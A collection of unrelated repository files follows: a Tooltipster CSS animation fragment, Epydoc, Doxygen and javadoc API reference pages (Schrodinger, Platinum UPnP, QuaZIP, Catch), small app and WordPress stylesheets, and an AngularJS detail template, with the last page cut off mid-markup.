rotateZ(0deg); -webkit-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 1); -webkit-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4); -moz-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4); -ms-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4); -o-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4); transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4); } .tooltipster-fall { top: 0; -webkit-transition-property: top; -moz-transition-property: top; -o-transition-property: top; -ms-transition-property: top; transition-property: top; -webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1); -webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); -moz-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); -ms-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); -o-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); } .tooltipster-fall-show { } .tooltipster-fall.tooltipster-dying { -webkit-transition-property: all; -moz-transition-property: all; -o-transition-property: all; -ms-transition-property: all; transition-property: all; top: 0px !important; opacity: 0; } .tooltipster-slide { left: -40px; -webkit-transition-property: left; -moz-transition-property: left; -o-transition-property: left; -ms-transition-property: left; transition-property: left; -webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1); -webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); -moz-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); -ms-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); -o-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15); } .tooltipster-slide.tooltipster-slide-show { } .tooltipster-slide.tooltipster-dying { -webkit-transition-property: all; -moz-transition-property: all; -o-transition-property: all; -ms-transition-property: all; transition-property: all; left: 0px !important; opacity: 0; } /* CSS transition for when contenting is changing in a tooltip that is still open. The only properties that will NOT transition are: width, height, top, and left */ .tooltipster-content-changing { opacity: 0.5; -webkit-transform: scale(1.1, 1.1); -moz-transform: scale(1.1, 1.1); -o-transform: scale(1.1, 1.1); -ms-transform: scale(1.1, 1.1); transform: scale(1.1, 1.1); }
Schrodinger/Schrodinger_2012_docs/python_api/api/schrodinger.trajectory.ffstructure._FFBondProperty-class.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>schrodinger.trajectory.ffstructure._FFBondProperty</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table width="100%" cellpadding="0" cellspacing="0"> <tr valign="top"> <td width="100%"> <span class="breadcrumbs"> <a href="schrodinger-module.html">Package&nbsp;schrodinger</a> :: <a href="schrodinger.trajectory-module.html">Package&nbsp;trajectory</a> :: <a href="schrodinger.trajectory.ffstructure-module.html">Module&nbsp;ffstructure</a> :: Class&nbsp;_FFBondProperty </span> </td> <td> <table cellpadding="0" cellspacing="0"> <!-- hide/show private --> <tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span></td></tr> <tr><td align="right"><span class="options" >[<a href="frames.html" target="_top">frames</a >]&nbsp;|&nbsp;<a href="schrodinger.trajectory.ffstructure._FFBondProperty-class.html" target="_top">no&nbsp;frames</a>]</span></td></tr> </table> </td> </tr> </table> <!-- ==================== CLASS DESCRIPTION ==================== --> <h1 class="epydoc">Class _FFBondProperty</h1><p class="nomargin-top"></p> <pre class="base-tree"> UserDict.DictMixin --+ | <strong class="uidshort">_FFBondProperty</strong> </pre> <hr /> <p>A dictionary to hold bond force field parameters.</p> <!-- ==================== INSTANCE METHODS ==================== --> <a name="section-InstanceMethods"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Instance Methods</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-InstanceMethods" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__init__"></a><span class="summary-sig-name">__init__</span>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">ffbond</span>, <span class="summary-sig-arg">ffhandle</span>, <span class="summary-sig-arg">_index</span>)</span></td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.trajectory.ffstructure._FFBondProperty-class.html#__getitem__" class="summary-sig-name">__getitem__</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">item</span>)</span><br /> Return the given item if it is a valid force field parameter for this bond, None if not.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.trajectory.ffstructure._FFBondProperty-class.html#__setitem__" class="summary-sig-name">__setitem__</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">item</span>, <span class="summary-sig-arg">value</span>)</span><br /> Set a force field parameter for the bond.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="keys"></a><span class="summary-sig-name">keys</span>(<span class="summary-sig-arg">self</span>)</span><br /> Returns a list of the property names for this bond.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code>UserDict.DictMixin</code></b>: <code>__cmp__</code>, <code>__contains__</code>, <code>__iter__</code>, <code>__len__</code>, <code>__repr__</code>, <code>clear</code>, <code>get</code>, <code>has_key</code>, <code>items</code>, <code>iteritems</code>, <code>iterkeys</code>, <code>itervalues</code>, <code>pop</code>, <code>popitem</code>, <code>setdefault</code>, <code>update</code>, <code>values</code> </p> </td> </tr> </table> <!-- ==================== METHOD DETAILS ==================== --> <a name="section-MethodDetails"></a> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Method Details</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-MethodDetails" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> </table> <a name="__getitem__"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">__getitem__</span>(<span class="sig-arg">self</span>, <span class="sig-arg">item</span>)</span> <br /><em class="fname">(Indexing operator)</em> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Return the given item if it is a valid force field parameter for this bond, None if not.</p> <dl class="fields"> <dt>Parameters:</dt> <dd><ul class="nomargin-top"> <li><strong class="pname"><code>item</code></strong> (string) - The property name.</li> </ul></dd> </dl> </td></tr></table> </div> <a name="__setitem__"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">__setitem__</span>(<span class="sig-arg">self</span>, <span class="sig-arg">item</span>, <span class="sig-arg">value</span>)</span> <br /><em class="fname">(Index assignment operator)</em> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Set a force field parameter for the bond.</p> <dl class="fields"> <dt>Parameters:</dt> <dd><ul class="nomargin-top"> <li><strong class="pname"><code>item</code></strong> (string) - The property name.</li> <li><strong class="pname"><code>value</code></strong> - The value to be set.</li> </ul></dd> </dl> </td></tr></table> </div> <br /> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table border="0" cellpadding="0" cellspacing="0" width="100%%"> <tr> <td align="left" class="footer"> Generated by Epydoc 3.0.1 on Tue Sep 25 02:23:07 2012 </td> <td align="right" class="footer"> <a target="mainFrame" href="http://epydoc.sourceforge.net" >http://epydoc.sourceforge.net</a> </td> </tr> </table> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
Accomodation_app/www/css/style.css
taddeiPablo/Accomodation_App
/* Empty. Add your own CSS if you like */ .Gmap{ height: 300px; border: 1px solid; } .descriptAcc{ height: 200px; margin-top: 20px; } .Gmap-Acc{ height: 300px; border: 1px solid; } .comment{ margin-top: 5px; height: 100px; } .main{ background-image: url('../img/fondo.jpg'); } .personalData{ margin-top: 50px; } .commentsAndLikes{ margin-top: 50px; } .accomodation{ margin-top: 50px; } .titulo{ font-weight: bold !important; margin-top: 20px; width: 137px; margin: auto !important; } .subTitulo{ margin: 30px auto auto !important; width: 264px; } .btnSearch{ margin-top: 30px; } .titles{ margin-top: 30px; } .validation{ color: #FF0000; margin-left: 15px; } .title{ margin-left: 16px; margin-top: 20px; width: 228px; } .file_name{ margin-top: 30px; } .file_country{ margin-top: 30px; } .input_phone{ width: 110px !important; float: left !important; } .item_Profile{ margin-top: 30px; } .subItem{ width: 171px; margin: auto; } .description_label{ padding-left: 10px; } .subdiv{ margin-top: 20px; } .footResult{ background: #3A3A3A; }
package/multimedia/platinum/src/Platinum/Docs/Doxygen/html/classPLT__MediaCache.html
widora/openwrt_widora
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.6"/> <title>Platinum UPnP SDK: PLT_MediaCache&lt; T, U &gt; Class Template Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">Platinum UPnP SDK &#160;<span id="projectnumber">1.0.5.13</span> </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.6 --> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="annotated.html"><span>Class&#160;List</span></a></li> <li><a href="classes.html"><span>Class&#160;Index</span></a></li> <li><a href="hierarchy.html"><span>Class&#160;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&#160;Members</span></a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="classPLT__MediaCache-members.html">List of all members</a> </div> <div class="headertitle"> <div class="title">PLT_MediaCache&lt; T, U &gt; Class Template Reference</div> </div> </div><!--header--> <div class="contents"> <p>The <a class="el" href="classPLT__MediaCache.html" title="The PLT_MediaCache template provides a way to hold references to object in memory. ">PLT_MediaCache</a> template provides a way to hold references to object in memory. <a href="classPLT__MediaCache.html#details">More...</a></p> <p><code>#include &lt;<a class="el" href="PltMediaCache_8h_source.html">PltMediaCache.h</a>&gt;</code></p> <a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2> <div class="textblock"><h3>template&lt;typename T, typename U&gt;<br/> class PLT_MediaCache&lt; T, U &gt;</h3> <p>The <a class="el" href="classPLT__MediaCache.html" title="The PLT_MediaCache template provides a way to hold references to object in memory. ">PLT_MediaCache</a> template provides a way to hold references to object in memory. </p> </div><hr/>The documentation for this class was generated from the following file:<ul> <li><a class="el" href="PltMediaCache_8h_source.html">PltMediaCache.h</a></li> </ul> </div><!-- contents --> </body> </html>
wp-content/themes/website/rtl.css
surajajency/wordpress
/* Theme Name: Website Adding support for language written in a Right To Left (RTL) direction is easy - it's just a matter of overwriting all the horizontal positioning attributes of your CSS stylesheet in a separate stylesheet file named rtl.css. http://codex.wordpress.org/Right_to_Left_Language_Support */ /* body { direction: rtl; unicode-bidi: embed; } */
src/lib/quazip-0.4.4/doc/html/classJlCompress-members.html
Kurios/mudlet-dev
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>QuaZIP: Member List</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> </head> <body> <!-- Generated by Doxygen 1.7.4 --> <div id="top"> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">QuaZIP&#160;<span id="projectnumber">quazip-0-4-4</span></div> </td> </tr> </tbody> </table> </div> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li><a href="dirs.html"><span>Directories</span></a></li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="annotated.html"><span>Class&#160;List</span></a></li> <li><a href="inherits.html"><span>Class&#160;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&#160;Members</span></a></li> </ul> </div> </div> <div class="header"> <div class="headertitle"> <div class="title">JlCompress Member List</div> </div> </div> <div class="contents"> This is the complete list of members for <a class="el" href="classJlCompress.html">JlCompress</a>, including all inherited members.<table> <tr class="memlist"><td><a class="el" href="classJlCompress.html#a8708eafcadc5c192a1d492e784cfc98f">compressDir</a>(QString fileCompressed, QString dir=QString(), bool recursive=true)</td><td><a class="el" href="classJlCompress.html">JlCompress</a></td><td><code> [static]</code></td></tr> <tr class="memlist"><td><a class="el" href="classJlCompress.html#a4a4de9c62ecf161bb658d4d80495ea97">compressFile</a>(QString fileCompressed, QString file)</td><td><a class="el" href="classJlCompress.html">JlCompress</a></td><td><code> [static]</code></td></tr> <tr class="memlist"><td><a class="el" href="classJlCompress.html#a9cdb92d29a94c6b13a718a3249685846">compressFiles</a>(QString fileCompressed, QStringList files)</td><td><a class="el" href="classJlCompress.html">JlCompress</a></td><td><code> [static]</code></td></tr> <tr class="memlist"><td><a class="el" href="classJlCompress.html#a365a153baa4c11812d93cbca60b6a293">extractDir</a>(QString fileCompressed, QString dir=QString())</td><td><a class="el" href="classJlCompress.html">JlCompress</a></td><td><code> [static]</code></td></tr> <tr class="memlist"><td><a class="el" href="classJlCompress.html#a38c0d58bfe3bbbcb3cf4e98d126633a3">extractFile</a>(QString fileCompressed, QString fileName, QString fileDest=QString())</td><td><a class="el" href="classJlCompress.html">JlCompress</a></td><td><code> [static]</code></td></tr> <tr class="memlist"><td><a class="el" href="classJlCompress.html#a309e9ee366719a4d8aa28f837fab73ae">extractFiles</a>(QString fileCompressed, QStringList files, QString dir=QString())</td><td><a class="el" href="classJlCompress.html">JlCompress</a></td><td><code> [static]</code></td></tr> <tr class="memlist"><td><a class="el" href="classJlCompress.html#ab42422be913f817d7e04c1b1cd5d0156">getFileList</a>(QString fileCompressed)</td><td><a class="el" href="classJlCompress.html">JlCompress</a></td><td><code> [static]</code></td></tr> </table></div> <hr class="footer"/><address class="footer"><small>Generated on Sat Jan 14 2012 14:54:06 for QuaZIP by&#160; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.7.4 </small></address> </body> </html>
tpJpa/src/main/webapp/scripts/app/entities/electronique/electronique-detail.html
CherifAbdoul/TpSirM1MIAGE_Ierlomenko-Kinfack-Haidara
<div> <h2><span translate="tpjpaApp.electronique.detail.title">Electronique</span> {{electronique.id}}</h2> <div class="table-responsive"> <table class="table table-striped"> <thead> <tr> <th translate="entity.detail.field">Field</th> <th translate="entity.detail.value">Value</th> </tr> </thead> <tbody> </tbody> </table> </div> <button type="submit" ui-sref="electronique" class="btn btn-info"> <span class="glyphicon glyphicon-arrow-left"></span>&nbsp;<span translate="entity.action.back"> Back</span> </button> </div>
doc/allclasses-noframe.html
andrewjw1995/pairtree-java
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_79) on Wed Jul 15 14:25:17 NZST 2015 --> <title>All Classes</title> <meta name="date" content="2015-07-15"> <link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style"> </head> <body> <h1 class="bar">All Classes</h1> <div class="indexContainer"> <ul> <li><a href="pairtree/Morty.html" title="class in pairtree">Morty</a></li> <li><a href="pairtree/PairPath.html" title="class in pairtree">PairPath</a></li> <li><a href="pairtree/PairPathIterator.html" title="class in pairtree">PairPathIterator</a></li> <li><a href="pairtree/PairTree.html" title="class in pairtree">PairTree</a></li> <li><a href="pairtree/PairTreeIterator.html" title="class in pairtree">PairTreeIterator</a></li> <li><a href="pairtree/Shorty.html" title="class in pairtree">Shorty</a></li> </ul> </div> </body> </html>
doc/html/class_catch_1_1_composite_generator.html
tomesm/dns-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.13"/> <meta name="viewport" content="width=device-width, initial-scale=1"/> <title>DNS Cache: Catch::CompositeGenerator&lt; T &gt; Class Template Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="navtree.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="resize.js"></script> <script type="text/javascript" src="navtreedata.js"></script> <script type="text/javascript" src="navtree.js"></script> <script type="text/javascript"> $(document).ready(initResizable); </script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/searchdata.js"></script> <script type="text/javascript" src="search/search.js"></script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectalign" style="padding-left: 0.5em;"> <div id="projectname">DNS Cache &#160;<span id="projectnumber">0.1</span> </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.13 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <script type="text/javascript" src="menudata.js"></script> <script type="text/javascript" src="menu.js"></script> <script type="text/javascript"> $(function() { initMenu('',true,false,'search.php','Search'); $(document).ready(function() { init_search(); }); }); </script> <div id="main-nav"></div> </div><!-- top --> <div id="side-nav" class="ui-resizable side-nav-resizable"> <div id="nav-tree"> <div id="nav-tree-contents"> <div id="nav-sync" class="sync"></div> </div> </div> <div id="splitbar" style="-moz-user-select:none;" class="ui-resizable-handle"> </div> </div> <script type="text/javascript"> $(document).ready(function(){initNavTree('class_catch_1_1_composite_generator.html','');}); </script> <div id="doc-content"> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> </div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div class="header"> <div class="summary"> <a href="#pub-methods">Public Member Functions</a> &#124; <a href="class_catch_1_1_composite_generator-members.html">List of all members</a> </div> <div class="headertitle"> <div class="title">Catch::CompositeGenerator&lt; T &gt; Class Template Reference</div> </div> </div><!--header--> <div class="contents"> <p><code>#include &lt;<a class="el" href="catch_8hpp_source.html">catch.hpp</a>&gt;</code></p> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a> Public Member Functions</h2></td></tr> <tr class="memitem:a923398b140371d1783858766864a1af5"><td class="memItemLeft" align="right" valign="top">&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_catch_1_1_composite_generator.html#a923398b140371d1783858766864a1af5">CompositeGenerator</a> ()</td></tr> <tr class="separator:a923398b140371d1783858766864a1af5"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a21a7070a00e4a6fe021294c356692692"><td class="memItemLeft" align="right" valign="top">&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_catch_1_1_composite_generator.html#a21a7070a00e4a6fe021294c356692692">CompositeGenerator</a> (<a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a> &amp;other)</td></tr> <tr class="separator:a21a7070a00e4a6fe021294c356692692"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ac3c57cf4ca5472f440bf71e2936bcd4a"><td class="memItemLeft" align="right" valign="top"><a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_catch_1_1_composite_generator.html#ac3c57cf4ca5472f440bf71e2936bcd4a">setFileInfo</a> (const char *fileInfo)</td></tr> <tr class="separator:ac3c57cf4ca5472f440bf71e2936bcd4a"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a5766205abd7004c508c20ddbb5e5555e"><td class="memItemLeft" align="right" valign="top">&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_catch_1_1_composite_generator.html#a5766205abd7004c508c20ddbb5e5555e">~CompositeGenerator</a> ()</td></tr> <tr class="separator:a5766205abd7004c508c20ddbb5e5555e"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a83d6c941e2e735b9528e6e832f7b76e7"><td class="memItemLeft" align="right" valign="top">&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_catch_1_1_composite_generator.html#a83d6c941e2e735b9528e6e832f7b76e7">operator T</a> () const</td></tr> <tr class="separator:a83d6c941e2e735b9528e6e832f7b76e7"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:af3774d42ad2d3453d089ca599efe0517"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_catch_1_1_composite_generator.html#af3774d42ad2d3453d089ca599efe0517">add</a> (const <a class="el" href="struct_catch_1_1_i_generator.html">IGenerator</a>&lt; T &gt; *generator)</td></tr> <tr class="separator:af3774d42ad2d3453d089ca599efe0517"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a2e03f42df85cdd238aabd77a80b075d5"><td class="memItemLeft" align="right" valign="top"><a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_catch_1_1_composite_generator.html#a2e03f42df85cdd238aabd77a80b075d5">then</a> (<a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a> &amp;other)</td></tr> <tr class="separator:a2e03f42df85cdd238aabd77a80b075d5"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aefdc11bcfccdf07d2db5f0da3ed8758c"><td class="memItemLeft" align="right" valign="top"><a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_catch_1_1_composite_generator.html#aefdc11bcfccdf07d2db5f0da3ed8758c">then</a> (T value)</td></tr> <tr class="separator:aefdc11bcfccdf07d2db5f0da3ed8758c"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> <h2 class="groupheader">Constructor &amp; Destructor Documentation</h2> <a id="a923398b140371d1783858766864a1af5"></a> <h2 class="memtitle"><span class="permalink"><a href="#a923398b140371d1783858766864a1af5">&#9670;&nbsp;</a></span>CompositeGenerator() <span class="overload">[1/2]</span></h2> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;typename T&gt; </div> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_catch_1_1_composite_generator.html">Catch::CompositeGenerator</a>&lt; T &gt;::<a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a> </td> <td>(</td> <td class="paramname"></td><td>)</td> <td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span></span> </td> </tr> </table> </div><div class="memdoc"> </div> </div> <a id="a21a7070a00e4a6fe021294c356692692"></a> <h2 class="memtitle"><span class="permalink"><a href="#a21a7070a00e4a6fe021294c356692692">&#9670;&nbsp;</a></span>CompositeGenerator() <span class="overload">[2/2]</span></h2> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;typename T&gt; </div> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_catch_1_1_composite_generator.html">Catch::CompositeGenerator</a>&lt; T &gt;::<a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a> </td> <td>(</td> <td class="paramtype"><a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a>&lt; T &gt; &amp;&#160;</td> <td class="paramname"><em>other</em></td><td>)</td> <td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span></span> </td> </tr> </table> </div><div class="memdoc"> </div> </div> <a id="a5766205abd7004c508c20ddbb5e5555e"></a> <h2 class="memtitle"><span class="permalink"><a href="#a5766205abd7004c508c20ddbb5e5555e">&#9670;&nbsp;</a></span>~CompositeGenerator()</h2> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;typename T&gt; </div> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_catch_1_1_composite_generator.html">Catch::CompositeGenerator</a>&lt; T &gt;::~<a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a> </td> <td>(</td> <td class="paramname"></td><td>)</td> <td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span></span> </td> </tr> </table> </div><div class="memdoc"> </div> </div> <h2 